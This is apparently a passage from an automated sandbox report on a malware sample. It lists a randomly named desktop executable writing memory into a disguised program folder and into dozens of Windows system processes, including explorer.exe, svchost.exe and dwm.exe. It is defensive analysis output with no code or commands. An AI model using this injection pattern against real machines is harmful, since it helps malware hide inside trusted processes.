        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E70000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 810000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1040000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1320000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1330000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 750000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1020000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1430000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 700000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 840000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 1220000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 120000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 590000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 330000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 710000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3110000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 130000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 340000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 720000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 380000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 610000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3230000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 140000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 350000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B40000Jump to behavior
